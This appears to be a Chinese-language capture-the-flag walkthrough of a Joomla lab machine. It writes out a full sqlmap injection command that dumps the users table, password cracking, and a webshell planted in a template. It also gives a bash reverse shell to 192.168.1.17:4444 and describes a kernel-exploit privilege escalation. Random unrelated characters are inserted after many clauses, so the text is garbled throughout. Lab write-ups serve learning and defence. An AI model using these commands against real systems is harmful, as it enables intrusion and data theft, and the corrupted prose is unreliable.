信息收集

arp-scan探測位置业栅，nmap去進(jìn)行一個初步的掃描秒咐。發(fā)現(xiàn)他運行在ubuntu上，只開放80端口碘裕，但是按照之前的經(jīng)驗携取，有可能把特殊端口藏起來了，用masscan查一遍全端口娘汞，在信息收集的步驟越詳細(xì)越好歹茶。順序可以是masscan-nmap夕玩，偷懶了==你弦。

我自己寫了一個masscan處理結(jié)果轉(zhuǎn)nmap的腳本，并且將輸出結(jié)果進(jìn)行了格式化燎孟，有需要可以聯(lián)系我禽作，還暫時沒有對其進(jìn)行優(yōu)化，自用而言也沒有打算優(yōu)化了揩页。還有各種開源的腳本但是不太符合我的習(xí)慣旷偿，建議各位可以去github搜索下成熟的開源腳本。

打開80端口發(fā)現(xiàn)他有提示說

image-20200616203004961.png

應(yīng)該是說只有web這一個入口去提權(quán)了爆侣，查看一些版本說明去搜索joomla的詳情工具等萍程。

[FreeBuf] https://www.freebuf.com/sectool/181440.html joomscan掃描工具

kali中自帶該工具，掃描后發(fā)現(xiàn)版本信息后臺信息等兔仰，去根據(jù)版本匹配漏洞發(fā)現(xiàn)3.7.0存在sql注入漏洞茫负，kali利用searchspolit進(jìn)行搜索發(fā)現(xiàn)用sqlmap即可對其進(jìn)行利用，具體的sqlmap利用語句可以用searchspolit進(jìn)行查看乎赴。

image-20200616204323136.png

獲取網(wǎng)站后臺權(quán)限

獲得數(shù)據(jù)庫信息忍法，獲取表信息后去查看表的內(nèi)容。最后的sqlmap語句如下所示：

sqlmap -u "http://192.168.1.16/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --dump -p list[fullordering]

在這個過程中利用了msfconsole的exp失敗榕吼，去github上搜索了下發(fā)現(xiàn)不如用sqlmap查找的方便饿序。

數(shù)據(jù)庫信息

利用john工具嘗試對密碼進(jìn)行破解。

image-20200616212906593.png

得到用戶名密碼羹蚣，admin/snoopy,進(jìn)入網(wǎng)頁后臺原探，這里需要注意網(wǎng)頁后臺的地址在joomscan掃描出來的地方，直接登錄index.php是網(wǎng)站的前臺。

image-20200616212933549.png

獲取普通用戶權(quán)限

進(jìn)入后查找上傳點咽弦，在模板處發(fā)現(xiàn)可以編輯的地方告匠，原本想傳個php小馬，具體webshell請參考：

[GITHUB] https://github.com/tennc/webshell webshell

后來發(fā)現(xiàn)模板路徑之類的很麻煩离唬，于是寫在了index.php中后专。

image-20200616221121154.png

需要注意要找對模板，我寫的是antsword的馬输莺，蟻劍連接成功戚哎。

image-20200616221232793.png

現(xiàn)在為了方便可以起一個nc監(jiān)聽反連過來，具體可以參考文章：

[ctrl_TT豆] https://www.cnblogs.com/-chenxs/p/11748488.html NC反彈shell的幾種方法

單純的使用會因為sh的解析出錯嫂用，可以用bash -c 的方法進(jìn)行繞過

bash -i >& /dev/tcp/192.168.1.17/4444 0>&1

image-20200616223940100.png

bash -c 'bash -i >& /dev/tcp/192.168.1.17/4444 0>&1'

成功獲取shell型凳。

獲取root用戶權(quán)限

嘗試了DC-1與DC-2的方法后，發(fā)現(xiàn)辦法進(jìn)行提權(quán)嘱函，參考臟牛漏洞甘畅，可能需要內(nèi)核漏洞去提權(quán)，查看內(nèi)核版本：

lsb_release -a
uname -a

image-20200617211828463.png

查看到是ubuntu16.04/4.4.0版本往弓。

利用searchspolit進(jìn)行查找選擇疏唾，利用4.4.x的漏洞去嘗試提權(quán)

image-20200617212414836.png

image-20200617212434369.png

獲取地址在這里。注意看能否ping通函似，不能需要修改hosts或者dns解析槐脏。

本機(jī)起http.server讓其進(jìn)行下載，下載成功后進(jìn)行解壓縮撇寞，

image-20200617220831227.png

image-20200617221324435.png

image-20200617221355089.png

獲取到root權(quán)限結(jié)束

總結(jié)

對于linux內(nèi)核的提權(quán)還需要進(jìn)行學(xué)習(xí)顿天，原理和利用手法都不是很熟練，還需要加強(qiáng)學(xué)習(xí)蔑担。對于linux內(nèi)核漏洞的選擇還沒有很深刻的認(rèn)識牌废。